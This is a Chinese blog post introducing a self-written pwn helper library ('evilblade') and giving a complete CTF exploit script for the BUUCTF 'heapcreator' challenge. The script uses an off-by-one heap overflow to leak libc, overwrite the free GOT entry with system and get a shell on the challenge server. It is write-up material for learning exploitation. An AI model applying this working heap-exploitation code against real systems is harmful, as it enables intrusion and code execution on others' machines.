首页 > 其他分享 >[刺客伍六七&黑客] 魔刀千刃诞生与维护记录

[刺客伍六七&黑客] 魔刀千刃诞生与维护记录

时间:2023-08-15 22:56:00浏览次数:31  
标签:p64 idx 千刃 free add 黑客 sla 魔刀 addr

魔刀千刃的特写

诞生之日:2023.7.29
上传至pip源之日:2023.8.15
image

此后会在此记录如何自己写一个自己的python库以及魔刀千刃的维护过程。

魔刀千刃(evilblade)

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述在这里插入图片描述

在这里插入图片描述

**只攻不防,天下无双**

实战

(和堆攻击帖子重合了,没关系)

0x0b hitcontraining_heapcreator

这是buu的pwn第二页最后一题,终于搞定了。
今天自己维护了自己的库魔刀千刃(evilblade),用这个来做pwn,所以从今天开始我的exp会多一些奇怪的东西。这些大家自己理解就好了,其实大概意思就那样,理解思路最重要。

一开始不知道off-by-one(本质就是可以溢出一个字节,覆盖下一个堆块大小用来伪造堆块,从而申请新的伪造堆块的时候达到溢出的效果)

意思就是程序以为堆块很大(因为被改了),但实际上很小,所以可以达成溢出的效果。

但是我一开始打的是unsorted bin attack来泄露地址……有点笨了,所以前面有一些没用的代码。

我一定要吐槽一下这个库的问题,我之前用11.3都没问题,这次有问题。
卡了我一晚上,最后换了11的库patch上才好了。

from pwn import *
from evilblade import *

context(os='linux', arch='amd64')
#context(os='linux', arch='amd64', log_level='debug')

setup('./heapc')
libset('libc-2.23.so')
rsetup('node4.buuoj.cn',25102)
evgdb()

def add(size,content):
    #p.sendlineafter(':','1')
    #p.sendlineafter(':',str(size))
    sla(':',str(1))
    sla(':',str(size))
    sla(':',content)

def edit(idx, content):
    sla(':','2')
    sla(':',str(idx))
    sa(':',content)

def free(idx):
    sla(':','4')
    sla(':',str(idx))

def dump(idx):
    sla(':','3')
    sla(':',str(idx))


add(400,b'a')#0
add(0x30,b'/bin/sh\x00'*3+p64(0x21))#1
add(0x30,b'/bin/sh\x00')#2
free(0)#释放这个堆快的时候,会把自己的大小写到下一个堆块的prev_size中,实际上gdb的颜色才是堆块的可控区域
add(0x198,b'a'*7)#0
dump(0)
addr = tet('add')
addr = tet('add')
addr = get64('add')
base = getbase(addr, 'write',0x2cd7c8)

edit(0,b'/bin/sh\x00'+b'a'*0x188+p64(0x1a0)+b'\x81')#覆盖off-by-one
free(1)
free(2)

add(0x70,b'a'*0x18+p64(0x41)+p64(0)*3+p64(0x21)+p64(0x70)*3+p64(0x21)+p64(0x70)+p64(gotadd('free')))
dump(1)
addr = tet('add')
addr = u64(ru('\n')[-7:-1].ljust(8,b'\x00'))
fp('addr',hex(addr))
base = getbase(addr,'free')
symoff('free')

os = base+0xf1147
sys = symoff('system',base)

edit(1,p64(sys))

free(0)
ia()

在这里插入图片描述

传至pip源并且开源

2023.8.15
今天编写了英文和中文版的帮助,在另外一个帖子帮助大家使用,并且开源。并且会不断更新。欢迎指出不足。

标签:p64,idx,千刃,free,add,黑客,sla,魔刀,addr
From: https://www.cnblogs.com/9man/p/17581874.html

相关文章

  • 魔刀千刃(轮廓)
    #include<iostream>#include"minecraft.h"usingnamespacestd;TxMinecraftmc;intmain(){boolc=true;c=mc.ConnectMinecraft("zk","badaa4c2a1b546f1868517667456b050");if(!c){cout<<"连接失败"<<endl;return0......
  • FVP原班人马的新盘子UEZ优易汇又跑路了,这次“黑客”又成“背锅大侠”
    去年7月,FVP跑路,当时FVP将锅甩给所谓的全球反洗钱组织这个根本不存在的组织。FX110在去年就已经曝光过:《保本yue收益15%?FVPTrade是虚假宣传多个监管的资金盘!》、《汇圈“大地震”!FVPTrade、TriumphFX、LILIUM三家资金盘齐暴雷》。而在FVP跑路以后,其操盘手又马不停蹄地搞起了UEZ优......
  • 持续改进数字资产组合的策略:黑客增长和 PLG 的好处
    产品引领型增长大家好,今天我将为大家介绍一种颠覆传统销售和业务增长认知的策略,它被称为”产品引领型增长“(Product-LedGrowth,简称PLG)。PLG是一种适应数字时代用户需求和行为的创新策略,它通过将产品作为核心,以用户体验和产品价值为导向,实现企业的增长和成功。如果你想了解更......
  • js黑客思想(1)
    十六进制  十六进制,它只在字符串内部起作用,如果您尝试将其用作标识符,他们将失败。一个有趣的方面是,十六进制转义必须使用小写的x,如果使用大写的X,它将不会被视为十六进制转义,js引擎将简单地将字符串处理为字面上的大写X,后面跟着你指定的字符。'\x61'//a"\x61"//a`\x61......
  • 网安周报|黑客利用未修补的WordPress插件缺陷来创建秘密管理员帐户
    网安周报是棱镜七彩推出的安全资讯专栏,旨在通过展示一周内发生的与开源安全、软件供应链安全相关攻击事件,让用户了解开源及软件供应链威胁,提高对安全的重视,做好防御措施。1、黑客利用未修补的WordPress插件缺陷来创建秘密管理员帐户来百度APP畅享高清图片终极会员插件中未修补的关......
  • 人工智能的安全:黑客攻击和数据隐私
    目录人工智能的安全:黑客攻击和数据隐私随着人工智能技术的快速发展和应用,安全问题也越来越受到人们的关注。黑客攻击和数据隐私已成为影响人工智能技术安全的两个主要问题。本文将介绍人工智能的安全,包括黑客攻击和数据隐私的概念和技术原理,并提供实现步骤和应用场景。一、引言......
  • 郭盛华:警惕黑客通过 GitHub 存储库传播恶意软件
    据观察,至少有一半来自与欺诈性网络安全公司相关的假研究人员的GitHub账户在代码托管服务上推送恶意存储库。国际知名白帽黑客、东方联盟创始人郭盛华表示,“所有7个存储库在撰写本文时仍然可用,它们声称是针对Discord、GoogleChrome和MicrosoftExchangeServer中所谓的零日......
  • 圆满收官!飞桨黑客松第四期高手云集,四大赛道开源贡献持续升级
    2023年2月20日PaddlePaddleHackathon飞桨黑客马拉松(以下简称为“飞桨黑客松”)第四期活动发布后,开发者们反响热烈,围绕四大赛道展开了激烈角逐,超过2000+位社区开发者参与到飞桨黑客松中,完成800+余次任务认领&PR提交,200+个任务被认领,历经三个月脑力激荡的Hack时光,共有80+个团队突出......
  • Hackathon 代码黑客马拉松采访复盘
    AIGCHackathon2023北京站我参加了选手采访提纲,这里我感觉有些点可以分享给大家。之前复盘的链接:下面是采访我的回答内容:1.请向大家简单介绍一下自己吧?子木,社区名称为程序员泥瓦匠,年龄三十岁,毕业于温州医科大学。有8年SaaS经验,曾在有赞和售后宝等SaaS公司工作。兴......
  • [4月摸鱼计划] 浅谈 InfruWeb3黑客松赛事
    事情起因:https://marketing.csdn.net/p/6798543ad6fdaad547c6431dd7df955a之前没接触过区块链这块,这次随即报名NFT这块。下面谈我的学习过程:第一阶段资料搜索(简单看看就行)什么是NFT?NFT是“非同质化代币”的缩写,是一种基于区块链技术的数字资产。和比特币等传统加密货币不同的是,NFT......